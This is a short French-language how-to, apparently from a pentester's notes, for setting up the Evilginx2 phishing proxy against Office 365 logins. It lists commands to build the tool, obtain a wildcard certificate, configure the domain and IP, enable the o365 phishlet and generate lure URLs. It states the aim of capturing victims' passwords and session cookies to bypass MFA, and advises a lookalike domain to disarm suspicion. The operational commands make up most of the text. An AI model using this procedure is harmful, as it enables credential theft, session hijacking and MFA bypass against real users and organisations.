Def et fonctionnement :

https://github.com/BakkerJan/evilginx2
EvilGinx est un outil de duplication de page d'authentification disponible pour plusieurs services d'authentification. Le but est de leurer une cible dans notre piège et le forcer à s'authentifier sur notre copie du site afin de récupérer son password et son cookie de session. Ce système permet de contourner le MFA

Exploitation :

Pour effectuer cette attaque plusieurs prérequis sont nécessaires :

• Domaine
• VM avec Debian 10
• Certificat sur la VM
  Installer EvilGINX :

sudo apt-get -y install git make
git clone https://github.com/BakkerJan/evilginx2.git
cd evilginx2
make
sudo make install

Créer le certificat :
On va utiliser certbot :

sudo apt -y install certbot 
sudo certbot certonly --manual --preferred-challenges=dns --server https://acme-v02.api.letsencrypt.org/directory --agree-tos -d *.test.domain.com --email noreply@live.com  

Lancer EvilGINX :

sudo evilginx

Ensuite il faut configurer un nom de domaine qui colle un peu pour endormir la vigilence.

Configurer EvilGINX :

Configurer le serveur EvilGINX :

config domain test.domain.com
config ip <ip>
blacklist off 

Configurer O365 :

phishlets hostname o365 test.domain.com
phishlets enable o365

Configurer le luring :

lures create o365
lures get-url 0

Démo :

Une démo complète est disponible dans l'article Phase 2. Getting a Login.
Sinon il suffit de récupérer l'url de lure pour se connecter et voir les résultats en live.